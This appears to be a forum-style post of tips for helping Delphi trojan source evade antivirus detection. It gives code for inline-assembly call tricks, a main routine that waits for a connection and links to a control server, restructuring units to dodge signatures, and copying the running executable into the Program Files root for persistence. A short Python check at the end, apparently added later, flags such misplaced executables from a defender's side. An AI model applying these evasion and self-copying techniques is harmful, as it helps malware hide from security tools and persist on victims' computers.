Trojan Source Code AV-Evasion Processing

------------------------------------------
Some add evasion like this:
------------------------------------------
begin
  asm  // call the code directly from inline assembly as the evasion treatment for the source
  call test
end;


Procedure test;
asm
nop
nop
nop
end;
------------------------------------------
I prefer this:
------------------------------------------
1. Run it at the end, e.g.

begin
  ReadSettings;
  Install;

  Serv := TServer.Create;
  While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000);
  Serv.Connect;
end.
------------------------------------------
You can
Procedure Main;
begin
  ReadSettings;
  Install;

  Serv := TServer.Create;
  While Not (InternetGetConnectedState(NIL, 0)) Do Sleep(5000);
  Serv.Connect;
end;
------------------------------------------
Calling it directly corresponds to the call you see in OD
begin
  Main;
end.
------------------------------------------
2. Add a unit and move some of the functions into it; haha, the structure changes but the functionality doesn't, guaranteed to evade detection
------------------------------------------
3. If copying to the system directory gets detected, change it to copy to C:/Program Files instead

function GetWinDir(): String;  // get the Windows directory
var
  ResultDir: Array[1..64] of char;
  i: integer;
begin
  for i := 1 to 64 do ResultDir[i] := char($20);  // pre-fill the buffer with spaces
  GetEnvironmentVariable('windir', @ResultDir, 64);
  Result := ResultDir;
end;
------------------------------------------
var
  myn, myn2: String;
begin
  myn := ExtractFilename(ParamStr(0));
  myn2 := COPY(trim(GetWinDir), 1, 2) + '/Program Files/' + myn; // make a copy under Program Files
  if not FileExists(myn2) then
  begin
    CopyFile(PChar(ParamStr(0)), PChar(myn2), True);
  end;
end;
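From the defender's side, the trick in item 3 leaves a tell: a legitimate installer creates a vendor subfolder, so an executable sitting directly in the Program Files root is unusual. The following added example (not code from the original post) is a small inventory check that flags such files; the sample paths are constructed, and handling both `/` and `\` separators mirrors the forward-slash path the post builds.

```python
import ntpath

# Roots where installers normally create a vendor subfolder; an executable
# placed directly in one of them (no subfolder) is worth a closer look.
PROGRAM_ROOTS = (r"C:\Program Files", r"C:\Program Files (x86)")
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".com"}


def is_exe_in_program_root(path: str) -> bool:
    """True if `path` is an executable located directly in a Program Files root."""
    norm = ntpath.normpath(path)  # folds '/' into '\' and removes '.' components
    parent, name = ntpath.split(norm)
    ext = ntpath.splitext(name)[1].lower()
    if ext not in EXEC_EXTENSIONS:
        return False
    return any(parent.lower() == root.lower() for root in PROGRAM_ROOTS)


def flag_suspicious(paths):
    """Return the input paths (unchanged) that match the check above."""
    return [p for p in paths if is_exe_in_program_root(p)]


# Constructed sample inventory, not taken from any real host.
SAMPLE_PATHS = [
    r"C:\Program Files\Vendor\app.exe",        # normal: inside a vendor folder
    "C:/Program Files/svchost.exe",            # forward slashes, directly in root
    r"C:\Program Files (x86)\update.dll",      # directly in the x86 root
    r"C:\Program Files\readme.txt",            # not executable
    r"C:\Windows\System32\notepad.exe",        # different root entirely
]

if __name__ == "__main__":
    for p in flag_suspicious(SAMPLE_PATHS):
        print("suspicious:", p)
```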
